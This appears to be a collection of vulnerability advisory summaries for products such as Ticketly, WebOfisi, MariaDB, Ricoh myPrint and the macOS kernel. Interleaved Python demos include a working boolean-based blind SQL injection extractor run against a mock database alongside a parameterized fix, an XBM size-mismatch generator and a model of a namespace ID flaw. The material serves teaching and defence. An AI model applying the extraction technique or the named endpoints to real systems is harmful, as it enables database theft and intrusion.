Ticketly 1.0 is affected by SQL injection in multiple parameters and resources reached through POST requests. This allows an attacker to read and modify sensitive information in the database used by the application. The proof of concept (PoC) consists of two POST requests, one producing an HTTP 500 error and the other an HTTP 200 OK response. The payloads include a boolean-based blind payload and an error-based payload.
The MariaDB client reads configuration from environment variables. The PAGER variable is vulnerable to a buffer overflow: if the value of PAGER is 512 characters or longer, the client crashes and becomes unusable. The cause is the function strmov, which copies the entire source string into a destination buffer of fixed size without checking its length.
Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering API secrets of related Google cloud printers, encrypted passwords of mail servers and names of printed files.
WebOfisi E-Ticaret V4 is a professional online shopping script with many features. A vulnerability was discovered during penetration testing: a SQL injection in the 'urun' parameter of the 'arama.html' page. The payloads used to exploit it are boolean-based blind, error-based, stacked queries, and AND/OR time-based blind.
The CherryFramework Cherry theme 3.1.4 for WordPress allows remote attackers to obtain potentially sensitive information via wp-content/themes/CherryFramework/admin/data_management/download_backup.php, because it offers the option of downloading a ZIP archive containing the entire content of the wp-content/themes directory.
Ticketly 1.0 is affected by a privilege escalation vulnerability: an attacker can create an administrator user account by sending a POST request to the resource /action/add_user.php without authentication.
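The Ticketly and WebOfisi entries above both list boolean-based blind payloads. The following is an added example, not code from either product, showing what such a payload does against a search handler that concatenates a parameter into SQL, and why the same payload is inert once the query is parameterized. The schema, table and column names (urunler, kullanici, sifre) and the in-memory SQLite database are constructed stand-ins for the real application's database.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the shop database (not the product's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE urunler (id INTEGER PRIMARY KEY, ad TEXT)")
    con.execute("CREATE TABLE kullanici (id INTEGER PRIMARY KEY, ad TEXT, sifre TEXT)")
    con.executemany("INSERT INTO urunler (ad) VALUES (?)", [("laptop",), ("telefon",)])
    con.execute("INSERT INTO kullanici (ad, sifre) VALUES ('admin', 's3cret')")
    con.commit()
    return con


def search_vulnerable(con, urun):
    """Hypothetical vulnerable handler: the 'urun' parameter is spliced into the SQL text."""
    sql = "SELECT id, ad FROM urunler WHERE ad = '" + urun + "'"
    return con.execute(sql).fetchall()


def search_fixed(con, urun):
    """Hardened handler: the parameter travels as a bound value, never as SQL syntax."""
    return con.execute("SELECT id, ad FROM urunler WHERE ad = ?", (urun,)).fetchall()


def blind_extract(search, con, subquery, max_len=32):
    """Boolean-based blind extraction.

    Each request asks one yes/no question: with the injected condition true the page
    returns the normal result for 'laptop', with it false the result is empty.  That
    single bit per request is enough to recover the subquery's output one character
    at a time, without any error text or data ever being echoed back.
    """
    baseline = search(con, "laptop")

    def oracle(cond):
        # Closes the string literal, appends the condition, re-balances the quote.
        payload = "laptop' AND (" + cond + ") AND '1'='1"
        return search(con, payload) == baseline

    result = ""
    for pos in range(1, max_len + 1):
        found = False
        for c in range(32, 127):
            cond = f"unicode(substr(({subquery}),{pos},1))={c}"
            if oracle(cond):
                result += chr(c)
                found = True
                break
        if not found:  # substr() past the end yields '' -> every comparison false
            break
    return result


if __name__ == "__main__":
    db = build_db()
    target = "SELECT sifre FROM kullanici WHERE ad='admin'"
    print("vulnerable:", repr(blind_extract(search_vulnerable, db, target)))
    print("fixed:     ", repr(blind_extract(search_fixed, db, target)))
```

Against search_vulnerable the loop recovers the admin password; against search_fixed the injected text is just a product name that matches nothing, so the oracle never fires and nothing is extracted. The error-based and time-based variants named in the entries differ only in the side channel used (an error message, or a delay) and reuse the same quote-breaking structure.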
This exploit is a proof of concept for a denial-of-service vulnerability in macOS 10.13 and iOS 11. It uses the workq_kernreturn syscall to cause a kernel panic; the panic is triggered by calling workq_kernreturn with the WQOPS_THREAD_WORKLOOP_RETURN option and any non-zero address.
POC Generator is a bash script that can be used to generate a proof-of-concept (POC) for a buffer overflow vulnerability. It takes a width and height as parameters and creates an XBM file with the given dimensions. It then modifies the XBM file to contain a buffer overflow payload. If the 'minimal' parameter is given, the script will shrink the payload to the minimal body size.
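The generator above relies on a property of the XBM format: the declared width and height and the length of the byte array are independent, so a reader that sizes its loops from the header but its buffer from the body can be made to overrun. The block below is an added Python illustration, not the bash script the entry describes. It builds an XBM with given dimensions, the 'minimal' mode is interpreted here as truncating the body to a single byte (an assumption about the original script's behaviour), the filler byte pattern is constructed, and check_xbm is the consistency test a hardened reader should perform before trusting the header.

```python
import re


def xbm_body_size(width, height):
    """Bytes a well-formed XBM body needs: each row is padded to whole bytes."""
    return ((width + 7) // 8) * height


def make_xbm(width, height, name="poc", minimal=False, fill=0x41):
    """Emit an XBM file. With minimal=True the body shrinks to one byte while the
    header still advertises the full dimensions (assumed meaning of 'minimal')."""
    full = xbm_body_size(width, height)
    n = 1 if minimal else full
    body = bytes([fill]) * n  # constructed filler, not a real payload
    rows = []
    for i in range(0, n, 12):
        rows.append("   " + ", ".join(f"0x{b:02x}" for b in body[i:i + 12]))
    return (
        f"#define {name}_width {width}\n"
        f"#define {name}_height {height}\n"
        f"static unsigned char {name}_bits[] = {{\n"
        + ",\n".join(rows)
        + "\n};\n"
    )


XBM_DEFINE = re.compile(r"#define\s+\w+_(width|height)\s+(\d+)")
XBM_BYTE = re.compile(r"0x([0-9a-fA-F]{1,2})")


def parse_xbm(text):
    """Return (width, height, body_bytes) from XBM source text."""
    dims = {k: int(v) for k, v in XBM_DEFINE.findall(text)}
    start = text.index("{")
    end = text.rindex("}")
    body = bytes(int(h, 16) for h in XBM_BYTE.findall(text[start:end]))
    return dims["width"], dims["height"], body


def check_xbm(text):
    """Return (declared_bytes, actual_bytes, ok). A reader must refuse ok=False:
    otherwise loops driven by width*height read past the body it actually got."""
    w, h, body = parse_xbm(text)
    need = xbm_body_size(w, h)
    return need, len(body), len(body) >= need


if __name__ == "__main__":
    print(check_xbm(make_xbm(16, 8)))                    # consistent file
    print(check_xbm(make_xbm(4096, 4096, minimal=True)))  # header promises 2 MiB, body has 1 byte
```

The mismatch between the first two numbers returned by check_xbm for the 'minimal' file is exactly the gap a vulnerable decoder walks through; rejecting the file when the body is shorter than the header demands closes it regardless of how the payload bytes are chosen.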
Since the patch for CVE-2018-8372, all inputs to native arrays are checked, and if any input equals the MissingItem value (which can cause type confusion) the bailout process is started. However, the "value" argument to OP_Memset is not checked. This can be exploited in the same way as issue 1581.
This vulnerability allows an attacker to override DAC security controls on files whose IDs are not mapped in the user namespace. The cause is that the new code omits the ID transformation for the kernel->namespaced mapping; only the namespaced->kernel mapping is transformed appropriately.
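The entry above describes an asymmetry between the two translation directions of a user namespace's ID map. The block below is an added, constructed model of that asymmetry, not the kernel's code: it implements both directions for nested namespaces the way uid_map semantics require (the second column of a nested map is expressed in the parent's IDs, so kernel->namespaced must first translate through the parent), and a from_kuid_buggy that skips that step. The namespace layout, the ID values and the owner_check helper are assumptions chosen to make the effect visible.

```python
INVALID_ID = -1  # stand-in for the kernel's invalid uid sentinel


class UserNs:
    """Constructed model of a user namespace.

    extents are (first_in_ns, first_in_parent, count), as written to uid_map.
    The parent column is in the PARENT namespace's id space, so a nested
    namespace reaches kernel ids only by translating through its parent.
    """

    def __init__(self, extents, parent=None):
        self.extents = list(extents)
        self.parent = parent

    def make_kuid(self, ns_uid):
        """namespaced -> kernel (the direction the entry says is handled correctly)."""
        for ns_first, p_first, count in self.extents:
            if ns_first <= ns_uid < ns_first + count:
                p_uid = p_first + (ns_uid - ns_first)
                return p_uid if self.parent is None else self.parent.make_kuid(p_uid)
        return INVALID_ID

    def from_kuid(self, kuid):
        """kernel -> namespaced, correct: bring the kernel id into the parent's
        id space first, then apply this namespace's own map."""
        p_uid = kuid if self.parent is None else self.parent.from_kuid(kuid)
        if p_uid == INVALID_ID:
            return INVALID_ID
        return self._parent_to_ns(p_uid)

    def from_kuid_buggy(self, kuid):
        """kernel -> namespaced with the parent translation omitted: a raw kernel
        id is matched against the parent-id column as if they were the same space."""
        return self._parent_to_ns(kuid)

    def _parent_to_ns(self, p_uid):
        for ns_first, p_first, count in self.extents:
            if p_first <= p_uid < p_first + count:
                return ns_first + (p_uid - p_first)
        return INVALID_ID


def owner_check(ns, caller_ns_uid, file_kuid, translate):
    """DAC owner test as seen from inside ns: does the file's kernel owner
    translate to the caller's namespaced uid?  (Hypothetical helper.)"""
    return translate(file_kuid) == caller_ns_uid


if __name__ == "__main__":
    root = UserNs([(0, 0, 4294967295)])                      # init namespace: identity map
    container = UserNs([(0, 100000, 65536)], parent=root)    # unprivileged container
    nested = UserNs([(0, 1000, 1)], parent=container)        # nested ns: its uid 0 is container uid 1000
    print("nested root's kernel uid:", nested.make_kuid(0))  # 101000
    # kernel uid 1000 is a host user that is NOT mapped into the container at all
    print("correct view of kuid 1000:", nested.from_kuid(1000))        # INVALID_ID
    print("buggy   view of kuid 1000:", nested.from_kuid_buggy(1000))  # 0 (looks like our root)
    print("owner check, buggy:", owner_check(nested, 0, 1000, nested.from_kuid_buggy))
```

With the correct translation a file owned by kernel uid 1000 has no owner inside the nested namespace and any owner-based DAC decision fails closed; with the parent step omitted the same kernel id is read as the map's parent-column value and the file appears to belong to the namespace's root, which is the kind of unmapped-ID override the entry describes.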